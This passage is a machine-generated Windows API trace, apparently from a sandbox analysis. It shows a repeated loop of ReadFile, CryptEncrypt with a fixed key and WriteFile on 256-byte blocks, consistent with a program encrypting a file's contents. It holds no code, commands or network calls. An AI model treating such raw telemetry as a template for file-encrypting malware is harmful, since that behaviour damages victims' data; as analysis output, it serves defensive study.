CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.139] GetLastError () returned 0x0 [0172.139] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.140] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.140] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.140] GetLastError () returned 0x0 [0172.140] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.140] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.140] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.140] GetLastError () returned 0x0 [0172.140] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.140] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.140] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.140] GetLastError () returned 0x0 [0172.140] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.140] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.140] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.140] GetLastError () returned 0x0 [0172.140] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.140] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.140] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.140] GetLastError () returned 0x0 [0172.140] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.140] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.140] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.140] GetLastError () returned 0x0 [0172.140] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.140] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.141] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.141] GetLastError () returned 0x0 [0172.141] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.141] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.141] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.141] GetLastError () returned 0x0 [0172.141] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.141] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.141] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.141] GetLastError () returned 0x0 [0172.141] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.141] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.141] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.141] GetLastError () returned 0x0 [0172.141] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.141] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.141] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.141] GetLastError () returned 0x0 [0172.141] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.141] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.141] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.141] GetLastError () returned 0x0 [0172.141] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.141] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.141] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.142] GetLastError () returned 0x0 [0172.142] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.142] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.142] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.142] GetLastError () returned 0x0 [0172.142] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.142] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.142] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.142] GetLastError () returned 0x0 [0172.142] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.142] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.142] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.142] GetLastError () returned 0x0 [0172.142] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.142] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.142] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.142] GetLastError () returned 0x0 [0172.142] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.142] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.142] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.142] GetLastError () returned 0x0 [0172.142] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.142] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.142] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.142] GetLastError () returned 0x0 [0172.142] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.142] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.143] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.143] GetLastError () returned 0x0 [0172.143] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.143] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.143] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.143] GetLastError () returned 0x0 [0172.143] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.143] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.143] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.143] GetLastError () returned 0x0 [0172.143] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.143] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.143] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.143] GetLastError () returned 0x0 [0172.143] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.143] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.143] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.143] GetLastError () returned 0x0 [0172.143] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.143] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.144] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.144] GetLastError () returned 0x0 [0172.144] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.144] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.144] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.144] GetLastError () returned 0x0 [0172.144] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.144] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.144] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.144] GetLastError () returned 0x0 [0172.144] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.144] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.144] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.144] GetLastError () returned 0x0 [0172.144] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.144] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.144] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.144] GetLastError () returned 0x0 [0172.144] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.144] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.144] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.144] GetLastError () returned 0x0 [0172.144] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.144] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.144] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.144] GetLastError () returned 0x0 [0172.144] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, 